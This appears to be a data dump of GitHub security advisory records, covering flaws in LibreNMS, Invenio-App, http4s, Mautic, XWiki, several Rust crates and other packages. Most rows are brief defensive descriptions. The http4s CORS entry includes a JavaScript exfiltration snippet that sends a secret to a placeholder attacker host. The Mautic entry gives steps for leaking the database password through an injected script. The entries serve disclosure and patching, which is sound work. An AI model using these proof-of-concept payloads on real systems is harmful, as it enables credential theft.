GHSA | GHSA-277v-gwfr-hmpj | Missing Authentication for Critical Function in LibreNMS | An issue was discovered in LibreNMS through 1.47. A number of scripts import the Authentication libraries, but do not enforce an actual authentication check. Several of these scripts disclose information or expose functions that are of a sensitive nature and are not expected to be publicly accessible. | {'CVE-2019-10668'} | 2021-05-11T15:02:40Z | 2019-10-11T18:43:06Z | MODERATE | 9.1 | {'CWE-306'} | {'https://github.com/advisories/GHSA-277v-gwfr-hmpj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10668', 'https://www.darkmatter.ae/xen1thlabs/librenms-authentication-bypass-vulnerability-xl-19-016/'} | null |
GHSA | GHSA-94mf-xfg5-r247 | Moderate severity vulnerability that affects invenio-app | ## APP_ALLOWED_HOSTS not always preventing host header injection
### Impact
A possible host header injection attack have been identified in Invenio-App. For an attack to be possible, all conditions below must be met:
1. Your webserver must have been configured to route all requests to your application.
2. You must have relied on ``APP_ALLOWED_HOSTS`` configuration variable to whitelist allowed host headers.
3. Flask's ``request.host`` must not have been evaluated during request handling.
An example of a view which does not evalute ``request.host`` is a simple view using just ``url_for`` to generate an external URL (similar is possible when rendering just a Jinja template):
```python
@app.route('/')
def index():
return url_for('index_url', _external=True)
```
This happens, because Werkzeug's trusted host feature, which ``APP_ALLOWED_HOSTS`` rely on, does not check the the list of trusted hosts in it's routing system that ``url_for`` is relying on.
### Patches
Invenio-App v1.0.6 and v1.1.1 fully fix the issue.
Note, we strongly recommend (see [Securing your instance](https://invenio.readthedocs.io/en/latest/deployment/securing-your-instance.html#allowed-hosts)) that you never route requests to your application with a wrong host header. The ``APP_ALLOWED_HOSTS`` configuration variable exists as an extra protective measure because it is easy to misconfigure your web server to allow requests with any host header.
### Workaround 1 - Configure your webserver
You should ensure that you never route requests with a wrong host header to your application. The workaround depends on which web server you are using to proxy requests to your application. In general it involves ensuring that the web server has two virtual hosts defined:
1. **Default virtual host**: a dummy default virtual host that by default is used unless the webserver can match the host header to another virtual host (i.e. a catch-all).
2. **Application virtual host**: the application virtual host responsible for proxing requests to the application, and configured to only reply to a whitelist of host headers.
Note, for instance in Nginx if you only configure the application virtual host, by default, it will also act as the default virtual host despite you having configured a whitelist of host headers.
Below is an example for Nginx. Note for clarity we have only included the virtual host for port 443, but this also extends to virtual hosts running on any other port.
```
# etc/nginx/nginx.conf
http {
# ...
include /etc/nginx/conf.d/*.conf;
}
```
**Default virtual host**
Notice, the ``server_name`` is ``_`` and the ``listen`` directive has it marked as ``default_server``.
```
# etc/nginx/conf.d/default.conf
server {
listen 443 default_server;
listen [::]:443 default_server;
server_name _;
# ...
return 301 https://www.example.com;
}
```
**Application virtual host**
Notice, the ``server_name`` is set to the host header whitelist.
```
# etc/nginx/conf.d/app.conf
server {
listen 443;
listen [::]:443;
server_name www.example.com;
# ...
}
```
### Workaround 2 - Include application snippet
We strongly recommend that you use the method described in Workaround 1.
If you are not able to upgrade to the patched versions of Invenio-App, you can include the following code snippet in your application to force evaluation of ``request.hosts``.
```python
@app.before_request
def before_request():
request.host
```
### For more information
If you have any questions or comments about this advisory:
* Email us at [info@inveniosoftware.org](mailto:info@inveniosoftware.org) | {'CVE-2019-1020006'} | 2021-09-07T20:41:31Z | 2019-07-16T00:52:10Z | MODERATE | 6.1 | {'CWE-74'} | {'https://github.com/inveniosoftware/invenio-app/security/advisories/GHSA-94mf-xfg5-r247', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020006', 'https://github.com/advisories/GHSA-94mf-xfg5-r247'} | null |
GHSA | GHSA-52cf-226f-rhr6 | Default CORS config allows any origin with credentials | ### Impact
#### Origin reflection attack
The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:
```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
case req if req.pathInfo === "/secret" =>
Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```
The following request is made to our server:
```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```
When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:
```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true
Content-Type: text/plain
p4ssw0rd
```
A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:
```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable.example.org/secret',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//bad-people.example.org/log?key='+this.responseText;
};
```
#### Null origin attack
The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.
### Patches
The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:
### Migration
The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:
```scala
val routes: HttpRoutes[F] = ???
val cors = CORS.policy
.withAllowOriginAll
.withAllowCredentials(false)
.apply(routes)
```
### Workarounds
It is possible to be safe in unpatched versions, but note the following defects exist:
* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.
* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.
* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.
* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.
* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice.
* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice.
* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice.
#### Explicit origins
In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(
anyOrigin = false,
allowOrigins = Set("http://trusted.example.com")
)
val cors = CORS(routes, config)
```
###### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default
.withAnyOrigin(false)
.withAllowedOrigins(Set("http://trusted.example.com"))
val cors = CORS(routes, config)
```
#### Disable credentials
Alternatively, sharing responses tainted by credentials can be deprecated.
##### 0.21.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORS.DefaultConfig.copy(allowCredentials = false)
val cors = CORS(routes, config)
```
##### 0.22.x, 0.23.x, 1.x
```scala
val routes: HttpRoutes[F] = ???
val config = CORSConfig.default.withAllowedCredentials(false)
val cors = CORS(routes, config)
```
### References
* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)
* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [GitHub](http://github.com/http4s/http4s)
* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy) | {'CVE-2021-39185'} | 2022-04-19T19:03:07Z | 2021-09-02T16:52:18Z | CRITICAL | 9.1 | {'CWE-346'} | {'https://github.com/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s/releases/tag/v0.23.2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39185'} | null |
GHSA | GHSA-4hjq-422q-4vpx | Secret data exfiltration via symfony parameters | ### Impact
Symfony parameters (which is what Mautic transforms configuration parameters into) can be used within other Symfony parameters by design. However, this also means that an admin who is normally not privy to certain parameters, such as database credentials, could expose them by leveraging any of the free text fields in Mautic’s configuration that are used in publicly facing parts of the application.
For example,
1. Go to Configuration page -> Landing Page Settings -> Analytics script and enter this: <`script> console.log("db password is: %mautic.db_password%"); </script>`
2. Visit any landing page and open the JS dev console. You will see the following message with real instance db password: `db password is: <real password>`
Risk rating: ModerateCVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
### Patches
Upgrade to 3.3.2
### Workarounds
No
### References
No
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@mautic.org](mailto:security@mautic.org) | {'CVE-2021-27908'} | 2022-04-19T19:02:51Z | 2021-04-06T17:20:58Z | MODERATE | 5.8 | {'CWE-732'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-27908', 'https://github.com/advisories/GHSA-4hjq-422q-4vpx', 'https://github.com/mautic/mautic/security/advisories/GHSA-4hjq-422q-4vpx'} | null |
GHSA | GHSA-8c3f-x5f9-6h62 | Command injection in @diez/generation | The `@diez/generation` npm package is a client for Diez. The locateFont method of @diez/generation has a command injection vulnerability. Clients of the @diez/generation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. All versions of this package are vulnerable as of the writing of this CVE. | {'CVE-2021-32830'} | 2021-09-02T17:08:20Z | 2021-09-02T17:08:20Z | LOW | 3.9 | {'CWE-77', 'CWE-78'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32830', 'https://www.npmjs.com/package/@diez/generation', 'https://securitylab.github.com/advisories/GHSL-2021-061-diez-generation-cmd-injection/', 'https://github.com/advisories/GHSA-8c3f-x5f9-6h62'} | null |
GHSA | GHSA-vg35-vc9f-q7x2 | Improper Restriction of XML External Entity Reference in ladon | Ladon since 0.6.1 (since ebef0aae48af78c159b6fce81bc6f5e7e0ddb059) is affected by: XML External Entity (XXE). The impact is: Information Disclosure, reading files and reaching internal network endpoints. The component is: SOAP request handlers. For instance: https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688. The attack vector is: Send a specially crafted SOAP call. | {'CVE-2019-1010268'} | 2022-03-22T18:19:05Z | 2019-07-26T16:09:54Z | CRITICAL | 9.8 | {'CWE-611'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-1010268', 'https://github.com/advisories/GHSA-vg35-vc9f-q7x2', 'https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688', 'https://www.exploit-db.com/exploits/43113', 'https://bitbucket.org/jakobsg/ladon/pull-requests/9'} | null |
GHSA | GHSA-jwgx-9mmh-684w | Credential exposure through log files in Undertow | A vulnerability was found in Undertow web server before 2.0.21. An information exposure of plain text credentials through log files because Connectors.executeRootHandler:402 logs the HttpServerExchange object at ERROR level using UndertowLogger.REQUEST_LOGGER.undertowRequestFailed(t, exchange) | {'CVE-2019-3888'} | 2022-02-11T21:13:16Z | 2019-06-13T20:02:56Z | CRITICAL | 9.8 | {'CWE-532'} | {'https://access.redhat.com/errata/RHSA-2019:2998', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3888', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3888', 'http://www.securityfocus.com/bid/108739', 'https://security.netapp.com/advisory/ntap-20220210-0019/', 'https://github.com/advisories/GHSA-jwgx-9mmh-684w', 'https://access.redhat.com/errata/RHSA-2019:2439', 'https://access.redhat.com/errata/RHSA-2020:0727'} | null |
GHSA | GHSA-mr95-9rr4-668f | High severity vulnerability that affects com.typesafe.akka:akka-actor_2.11 and com.typesafe.akka:akka-actor_2.12 | Lightbend Akka 2.5.x before 2.5.16 allows message disclosure and modification because of an RNG error. A random number generator is used in Akka Remoting for TLS (both classic and Artery Remoting). Akka allows configuration of custom random number generators. For historical reasons, Akka included the AES128CounterSecureRNG and AES256CounterSecureRNG random number generators. The implementations had a bug that caused the generated numbers to be repeated after only a few bytes. The custom RNG implementations were not configured by default but examples in the documentation showed (and therefore implicitly recommended) using the custom ones. This can be used by an attacker to compromise the communication if these random number generators are enabled in configuration. It would be possible to eavesdrop, replay, or modify the messages sent with Akka Remoting/Cluster. | {'CVE-2018-16115'} | 2021-09-15T20:58:47Z | 2018-10-22T20:44:26Z | CRITICAL | 9.1 | {'CWE-338'} | {'https://github.com/advisories/GHSA-mr95-9rr4-668f', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16115', 'https://doc.akka.io/docs/akka/current/security/2018-08-29-aes-rng.html'} | null |
GHSA | GHSA-rfmp-jvr7-hx78 | Inadequate Encryption Strength in Apache NiFi | In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1. | {'CVE-2020-9491'} | 2022-04-29T20:27:44Z | 2022-01-06T20:41:06Z | HIGH | 7.5 | {'CWE-327'} | {'https://nifi.apache.org/security#CVE-2020-9491', 'https://lists.apache.org/thread.html/re48582efe2ac973f8cff55c8b346825cb491c71935e15ab2d61ef3bf@%3Ccommits.nifi.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9491', 'https://lists.apache.org/thread.html/r2d9c21f9ec35d66f2bb42f8abe876dabd786166b6284e9a33582c718@%3Ccommits.nifi.apache.org%3E', 'https://github.com/advisories/GHSA-rfmp-jvr7-hx78', 'https://github.com/apache/nifi/commit/441781cec50f77d9f1e65093f55bbd614b8c5ec6'} | null |
GHSA | GHSA-wg4r-q74r-p7c8 | Cross-site Scripting in ShowDoc | ShowDoc is vulnerable to stored cross-site scripting due to unrestricted file upload in versions 2.10.3 and prior. A patch is available and anticipated to be part of version 2.10.4. | {'CVE-2022-0941'} | 2022-03-23T15:42:50Z | 2022-03-15T00:01:03Z | MODERATE | 5.4 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-0941', 'https://huntr.dev/bounties/040a910e-e689-4fcb-9e4f-95206515d1bc', 'https://github.com/star7th/showdoc/commit/4b6e6603c714aab1de346c5f5cb0bbb4c871be1f', 'https://github.com/advisories/GHSA-wg4r-q74r-p7c8'} | null |
GHSA | GHSA-5hv6-mh8q-q9v8 | RCE in XWiki | ### Impact
Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution.
### Patches
It has been patched in both version XWiki 12.5 and XWiki 11.10.6.
### Workarounds
The only workaround is to give SCRIPT right only to trusted users.
### References
https://jira.xwiki.org/browse/XWIKI-17423
It's been reported by the GitHub Security Lab under https://jira.xwiki.org/browse/XWIKI-17141.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki](https://jira.xwiki.org)
* Email us at [our security mailing list](mailto:security@xwiki.org) | {'CVE-2020-15252'} | 2021-11-19T14:41:16Z | 2020-10-16T16:55:49Z | HIGH | 8.5 | {'CWE-94', 'CWE-74'} | {'https://jira.xwiki.org/browse/XWIKI-17141', 'https://github.com/advisories/GHSA-5hv6-mh8q-q9v8', 'https://jira.xwiki.org/browse/XWIKI-17423', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5hv6-mh8q-q9v8', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15252'} | null |
GHSA | GHSA-64j8-7gp2-xjx5 | Data races in try-mutex | An issue was discovered in the try-mutex crate before 0.3.0 for Rust. TryMutex<T> allows cross-thread sending of a non-Send type. | {'CVE-2020-35924'} | 2021-08-25T20:50:28Z | 2021-08-25T20:50:28Z | MODERATE | 5.5 | {'CWE-787'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-35924', 'https://github.com/mpdn/try-mutex/issues/2', 'https://rustsec.org/advisories/RUSTSEC-2020-0087.html', 'https://github.com/advisories/GHSA-64j8-7gp2-xjx5'} | null |
GHSA | GHSA-j3jw-j2j8-2wv9 | Improper Verification of Cryptographic Signature in starkbank-ecdsa | The verify function in the Stark Bank .NET ECDSA library (ecdsa-dotnet) 1.3.1 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages. | {'CVE-2021-43569'} | 2021-11-15T14:43:40Z | 2021-11-10T20:58:03Z | CRITICAL | 9.8 | {'CWE-347'} | {'https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43569', 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/', 'https://github.com/advisories/GHSA-j3jw-j2j8-2wv9'} | null |
GHSA | GHSA-6mq2-37j5-w6r6 | Moderate severity vulnerability that affects webrick | WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel 248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. | {'CVE-2009-4492'} | 2022-04-19T19:03:27Z | 2017-10-24T18:33:38Z | MODERATE | 0 | {'CWE-20'} | {'http://www.securityfocus.com/bid/37710', 'https://github.com/advisories/GHSA-6mq2-37j5-w6r6', 'http://www.ush.it/team/ush/hack_httpd_escape/adv.txt', 'http://secunia.com/advisories/37949', 'https://nvd.nist.gov/vuln/detail/CVE-2009-4492', 'http://www.vupen.com/english/advisories/2010/0089', 'http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection', 'http://www.redhat.com/support/errata/RHSA-2011-0909.html', 'http://www.redhat.com/support/errata/RHSA-2011-0908.html', 'http://www.securityfocus.com/archive/1/508830/100/0/threaded', 'http://securitytracker.com/id?1023429'} | null |
GHSA | GHSA-vh4p-6j7g-f4j9 | Data races in lock_api | An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockReadGuard unsoundness. | {'CVE-2020-35911'} | 2021-08-25T20:49:56Z | 2021-08-25T20:49:56Z | MODERATE | 4.7 | {'CWE-362'} | {'https://github.com/Amanieu/parking_lot/pull/262', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35911', 'https://github.com/advisories/GHSA-vh4p-6j7g-f4j9', 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'} | null |
GHSA | GHSA-rwpr-83g3-96g7 | Cross-site scripting in padrino-contrib | The breadcrumbs contributed module through 0.2.0 for Padrino Framework allows XSS via a caption. | {'CVE-2019-16145'} | 2021-08-17T22:29:55Z | 2019-09-23T18:33:07Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-rwpr-83g3-96g7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16145', 'https://github.com/padrino/padrino-contrib/pull/35'} | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.